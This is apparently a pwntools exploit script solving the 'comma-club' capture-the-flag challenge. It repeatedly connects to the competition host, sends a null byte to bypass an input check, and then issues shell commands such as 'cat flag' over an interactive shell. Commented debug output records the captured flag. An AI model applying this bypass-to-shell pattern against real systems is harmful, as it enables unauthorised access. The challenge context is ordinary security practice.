#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./challengee")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
# context.log_level='debug'
# p = remote("addr", 1337)
while True:
    # p = process([exe.path])
    p = remote("comma-club.chal.hackthe.vote", 1337)
    def gdbs():
        context.terminal = ["foot"]
        gdb.attach(p, gdbscript="""

                   """)
        # p = gdb.debug([exe.path],"""
        #
        #                 """)

    sla = lambda msg, data: p.sendlineafter(msg, data)
    sa = lambda msg, data: p.sendafter(msg, data)
    sl = lambda data: p.sendline(data)
    s = lambda data: p.send(data)
    check = True
    def add(can,vote):
        sla(">","1")
        sla(">",str(can))
        sla(">",str(vote))
        sla(">","3")
        # sla(">","3")
        # sla(">","a"*16)
        # for i in range(999):
        #     add(2,434343)

        # gdbs()
    sla(">","3")
    sla(">","\0")
    try:
        # buff = p.recvuntil("Correct!",timeout=0.5)
        # if buff:
        p.recvuntil("Incorrect")
        # sl("lmaodark")
        # p.recvuntil("lmaodark")
        # sl("cat flag.txt")
        # p.interactive()
        pass
        # p.interactive()
        # break
    except:
        sl("lmaodark")
        sl("cat flag")
        p.interactive()
        # pass
# proc
# sbin
# tmp
# usr
# $ cat flag
# [DEBUG] Sent 0x9 bytes:
#     b'cat flag\n'
# [DEBUG] Received 0x20 bytes:
#     b'flag{w3lc0me_2_TH3_2_c0mm4_c1ub}'
# flag{w3lc0me_2_TH3_2_c0mm4_c1ub}$  






# p.interactive()
# good luck pwning :)

